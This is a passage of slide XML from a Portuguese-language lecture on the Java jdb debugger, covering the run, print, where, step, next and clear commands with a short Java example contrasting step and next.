            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>inicia a execu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ção do programa que se quer depurar; execução será interrompida no primeiro breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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4. Inspecionar o estado do programa  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>print:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> Imprime o valor de objetos, variáveis, expressões.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>print MyClass.myStaticField</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>print myObj.myInstanceField</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>print i + j + k                              -- fields or local variables</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>print myObj.myMethod() </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>print new java.lang.String("Hello").length()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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49" name="Google Shape;349;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125150" y="4629150"/>
            <a:ext cx="6616800" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nota: para exibir valores de variáveis locais, compilar com javac -g</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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5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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Inspecionar o estado do programa (cont.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>here:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> imprime um dump do stack da thread atual</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>where all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> imprime um dump do stack de todas as threads</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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5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5. Avan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>çar com a execução</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>step:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> se comando atual for uma chamada de método, passa-se a depurar sua execução (também chamado de “step into”)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>se o comando atual for uma chamada de um método, pula-se a sua execução e passa-se a depurar a próxima linha (também chamado de “step over”)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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6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Exemplo: step vs next</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3438475"/>
            <a:ext cx="8832300" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>if the debugger is paused at line 2:</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t> moves execution to line 3</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900"/>
              <a:t>step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t> enters helperMethod() and pauses at line 6</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Google Shape;370;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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71" name="Google Shape;371;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356000" y="1088225"/>
            <a:ext cx="6787800" cy="22935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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> void mainMethod() {</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2:    helperMethod();</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>3:    System.out.println("Finished helperMethod");</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4:  }</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>5:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> void helperMethod() {</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>6:    System.out.println("Inside helperMethod");</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>7:  }</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p6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6. Remover breakpoints</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>clear (sem argumentos):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> lista breakpoints</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>clear:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> remove breakpoints</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>clear MyClass:45  -- remove bp da linha 45 de MyClass</a:t>
